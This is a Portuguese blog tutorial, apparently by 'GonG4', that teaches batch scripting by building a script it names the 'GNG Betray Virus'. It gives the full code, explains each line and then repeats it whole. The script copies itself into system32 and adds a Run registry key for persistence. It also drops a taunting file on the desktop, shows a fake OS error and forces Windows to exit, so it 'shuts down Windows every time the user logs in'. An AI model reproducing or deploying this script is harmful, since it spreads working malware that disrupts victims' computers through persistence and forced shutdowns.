Opa! A pergunta correta é:
Quem não gosta de programar scripts batch?
Eles são chamados de badcom's, mas não são realmente badcom's (.COM Mal). Badcom's são programas compilados, geralmente feitos em assembly com a extenção .COM, ou seja, não são scripts (linhas de comando).
O que realmente quero mostrar a vocês, leitores, é como programar um script batch (extenção .BAT) de modo "proficional" (não somente comandos simples como copy e del..., mas comandos de condições, executaveis, DLL's, etc).
~~ Vamos começar...
Inicie o CMD (prompt de comando)
Como todo programados sabe, é necessário o uso de variáveis para a funcionalidade de um bom programa, não um simples como copy x, del x...
No Windows existe variaveis ambiente, são aquelas que já estão gravadas nele, para vê-las é só usar o comando SET, uma das principais é a variável path, nela fica os caminhos onde o computador, caso um arquivo não exista na pasta atual, analiza e procura pelos mesmos. As variáveis estão sempre entre %.
Caso queira informações de algum comando use Comando /?.
Começando a programar:
Inicie o notepad (bloco de notas)
- Siga o tutorial e digite os comandos que estão nas caixas.
rem Cabeçalho do arquivo.
Rem é usado para gravar comentários, eles não irão interferir em nada na execução do script.
@echo off
Em um batch script esse comando é importante, pois com ele o usuario não pode ver de onde o arquivo está sendo executado.
set path=%systemroot%;%systemroot%\system32;%cd%
Os %% indicam que a palavra é uma variável (systemroot) ou retorno de um comando (CD, pega pasta do atual), caso você use somente a palavra ele vai entender como simples letras.
Usando esse comando você vai acelerar seu script. O verdadeiro valor da variável path vai ser, no meu caso: C:\windows;C:\windows\system32;X:\pasta do arquivo
color 02
Use a cor que você preferir. No meu caso usei 02 (verde escuro). Para mais informações: color /?.
set cfgng=%cd%
Grava a pasta atual em uma variável.
title GNG Betray
Adiciona um título à tela do CMD. No caso "GNG Betray" (sem aspas).
cls
Limpa a tela do CMD.
echo ::::: GNG Betray Virus :::::
Fala determinada letra, palavra ou frase. No caso acima: "GNG Betray Virus" (recomendo não usar acentos).
set user=%username%
set userpath=%homepath%\
set desktop=%homepath%\desktop
set windows=%windir%\
set drive=%systemdrive%\
Determina algumas variáveis p/ uso mais facilitado do script.
set batchname=arquivo.bat
Em vez de arquivo.bat, você coloca o nome do seu arquivo.
cd %desktop%
Vai para o desktop do usuário, todas as ações abaixo desse comando vão ser executadas nele caso você não mude o destino ou vá para outra pasta.
echo.
echo %cfgng%\%batchname%
echo Creating virus log file...
echo Blz %user%!! > GNGBetray.txt
echo Estou aqui para foder com seu PC!! >> GNGBetray.txt
echo By GonG4 >> GNGBetray.txt
echo Log file created.
Echo. = pulo de linha.
Segundo, terceiro e último echo's imprimem frases no cmd.
Os outros escrevem um arquivo chamado GNGBetray.txt com o texto:
Blz
Estou aqui para foder com seu PC!!
By GonG4
> = Cria um arquivo e escreve a primeira linha.
>> = Escreve nova linha no arquivo.
echo.
echo Copiando arquivos p/ kernel...
cd \
copy %cfgng%\%batchname% %windows%\system32\%batchname%
cd \ = Volta para o drive. No meu caso: C:\.
Copy = Copia determinado arquivo para determinada pasta.
echo.
echo Infectando registro...
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\run /v Killer123 /t REG_SZ /d %windows%\system32\%batchname%
echo Registro infectado.
Reg = Edição de registro.
msg * Error in OS, please restart computer!
echo.
RunDll32.exe USER.EXE,ExitWindowsExec
Msg = Mostra mensagem. * é usado para mostrar as mensagens p/ todos os usuários.
Rundll32 executa funções de executaveis e de DLL's, mas só algumas!!
Código completo do virús:
rem Cabeçalho do arquivo.
@echo off
set path=%systemroot%;%systemroot%\system32;%cd%
color 02
set cfgng=%cd%
title GNG Betray
cls
rem Começo dos códigos.
echo ::::: GNG Betray Virus :::::
set user=%username%
set userpath=%homepath%\
set desktop=%homepath%\desktop
set windows=%windir%\
set drive=%systemdrive%\
set batchname=btrybat.bat
cd %desktop%
echo.
echo %cfgng%\%batchname%
echo Creating virus log file...
echo Blz %user%!! > GNGBetray.txt
echo Estou aqui para foder com seu PC!! >> GNGBetray.txt
echo By GonG4 >> GNGBetray.txt
echo Log file created.
echo.
echo Copiando arquivos p/ kernel...
cd \
copy %cfgng%\%batchname% %windows%\system32\%batchname%
echo.
echo Infectando registro...
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\run /v Killer123 /t REG_SZ /d %windows%\system32\%batchname%
echo Registro infectado.
msg * Error in OS, please restart computer!
echo.
RunDll32.exe USER.EXE,ExitWindowsExec
Esse simples virús deve ser salvo em .BAT.
NÃO ESQUEÇA DE MUDAR A VARIÁVEL DO NOME DO ARQUIVO .BAT!!
Cuidado para não executar!!
Funções:
Desliga Windows toda hora que usúario loga no computador.
~~
Espero que tenha gostado.
GonG4
;D
Nenhum comentário:
Postar um comentário